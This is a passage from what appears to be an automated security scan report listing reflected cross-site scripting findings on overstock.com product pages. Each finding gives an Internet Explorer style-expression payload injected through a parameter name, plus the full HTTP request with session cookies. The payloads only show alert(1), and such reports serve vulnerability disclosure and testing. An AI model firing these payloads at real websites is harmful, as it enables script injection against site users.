GET /Home-Garden/Wesley-Indoor-Outdoor-Portable-Fireplace/4247894/product.html?219b8"style%3d"x%3aexpression(alert(1))"08b342089de=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.392. http://www.overstock.com/Home-Garden/Windham-Floor-Cabinet-with-Glass-Door/3082718/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f13c2"style%3d"x%3aexpression(alert(1))"05589e3fceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f13c2"style="x:expression(alert(1))"05589e3fceb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Windham-Floor-Cabinet-with-Glass-Door/3082718/product.html?f13c2"style%3d"x%3aexpression(alert(1))"05589e3fceb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.393. http://www.overstock.com/Home-Garden/Winthrop-81-piece-Flatware-Set/5124073/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbe1f"style%3d"x%3aexpression(alert(1))"5995f492d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbe1f"style="x:expression(alert(1))"5995f492d92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Winthrop-81-piece-Flatware-Set/5124073/product.html?cbe1f"style%3d"x%3aexpression(alert(1))"5995f492d92=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.394. http://www.overstock.com/Home-Garden/Wood-Bookcase-Display-Cabinet/4734278/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f32a4"style%3d"x%3aexpression(alert(1))"25fe5ef1790 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f32a4"style="x:expression(alert(1))"25fe5ef1790 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Wood-Bookcase-Display-Cabinet/4734278/product.html?f32a4"style%3d"x%3aexpression(alert(1))"25fe5ef1790=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.395. http://www.overstock.com/Home-Garden/Wood-Corner-Computer-Desk/2481102/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4925"style%3d"x%3aexpression(alert(1))"75be579206c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4925"style="x:expression(alert(1))"75be579206c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Wood-Corner-Computer-Desk/2481102/product.html?b4925"style%3d"x%3aexpression(alert(1))"75be579206c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.396. http://www.overstock.com/Home-Garden/Wrinkle-resistant-300-TC-Reversible-Solid-Stripe-Duvet-Cover-Set/4064084/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19648"style%3d"x%3aexpression(alert(1))"b926825f8ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19648"style="x:expression(alert(1))"b926825f8ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Wrinkle-resistant-300-TC-Reversible-Solid-Stripe-Duvet-Cover-Set/4064084/product.html?19648"style%3d"x%3aexpression(alert(1))"b926825f8ba=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.397. http://www.overstock.com/Jewelry-Watches/10k-Gold-1-3ct-TDW-Black-and-White-Diamond-Heart-Ring-I-J-I2-I3/3300998/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 584a1"style%3d"x%3aexpression(alert(1))"621554f7b28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 584a1"style="x:expression(alert(1))"621554f7b28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/10k-Gold-1-3ct-TDW-Black-and-White-Diamond-Heart-Ring-I-J-I2-I3/3300998/product.html?584a1"style%3d"x%3aexpression(alert(1))"621554f7b28=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.398. http://www.overstock.com/Jewelry-Watches/14k-Gold-1-2ct-TDW-Round-Value-Diamond-Studs-K-L-I2-I3/3324616/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a2d3"style%3d"x%3aexpression(alert(1))"2ab8b951d00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a2d3"style="x:expression(alert(1))"2ab8b951d00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/14k-Gold-1-2ct-TDW-Round-Value-Diamond-Studs-K-L-I2-I3/3324616/product.html?4a2d3"style%3d"x%3aexpression(alert(1))"2ab8b951d00=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.399. http://www.overstock.com/Jewelry-Watches/14k-Gold-1-4ct-TDW-Round-Diamond-3-stone-Earrings-H-I-I2-I3/2069877/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97679"style%3d"x%3aexpression(alert(1))"00fd0fce08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97679"style="x:expression(alert(1))"00fd0fce08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/14k-Gold-1-4ct-TDW-Round-Diamond-3-stone-Earrings-H-I-I2-I3/2069877/product.html?97679"style%3d"x%3aexpression(alert(1))"00fd0fce08=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.400. http://www.overstock.com/Jewelry-Watches/14k-Gold-Overlay-Curved-Textured-Hinged-Bracelet/3846813/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34f33"style%3d"x%3aexpression(alert(1))"490d1ccccdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34f33"style="x:expression(alert(1))"490d1ccccdd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/14k-Gold-Overlay-Curved-Textured-Hinged-Bracelet/3846813/product.html?34f33"style%3d"x%3aexpression(alert(1))"490d1ccccdd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.401. http://www.overstock.com/Jewelry-Watches/14k-White-Gold-1-6ct-TDW-Diamond-Lightweight-Ring-I-J-I2-I3/2116823/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dffae"style%3d"x%3aexpression(alert(1))"bd5138a42fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dffae"style="x:expression(alert(1))"bd5138a42fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/14k-White-Gold-1-6ct-TDW-Diamond-Lightweight-Ring-I-J-I2-I3/2116823/product.html?dffae"style%3d"x%3aexpression(alert(1))"bd5138a42fd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.402. http://www.overstock.com/Jewelry-Watches/14k-White-Gold-Overlay-Martini-set-CZ-Earrings/3866859/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c09ed"style%3d"x%3aexpression(alert(1))"97b85ce780a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c09ed"style="x:expression(alert(1))"97b85ce780a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/14k-White-Gold-Overlay-Martini-set-CZ-Earrings/3866859/product.html?c09ed"style%3d"x%3aexpression(alert(1))"97b85ce780a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.403. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Silver-Diamond-Accent-Hoop-Earrings/3998857/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac69"style%3d"x%3aexpression(alert(1))"55820568455 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac69"style="x:expression(alert(1))"55820568455 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/18k-Gold-over-Silver-Diamond-Accent-Hoop-Earrings/3998857/product.html?5ac69"style%3d"x%3aexpression(alert(1))"55820568455=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.404. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Silver-Diamond-Accent-Mini-hoop-Earrings/3998862/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f950"style%3d"x%3aexpression(alert(1))"795b9a64c7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f950"style="x:expression(alert(1))"795b9a64c7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/18k-Gold-over-Silver-Diamond-Accent-Mini-hoop-Earrings/3998862/product.html?5f950"style%3d"x%3aexpression(alert(1))"795b9a64c7d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.405. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Sterling-Silver-Multi-gemstone-Hoop-Earrings/3128810/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f349"style%3d"x%3aexpression(alert(1))"e9d993e339f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f349"style="x:expression(alert(1))"e9d993e339f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
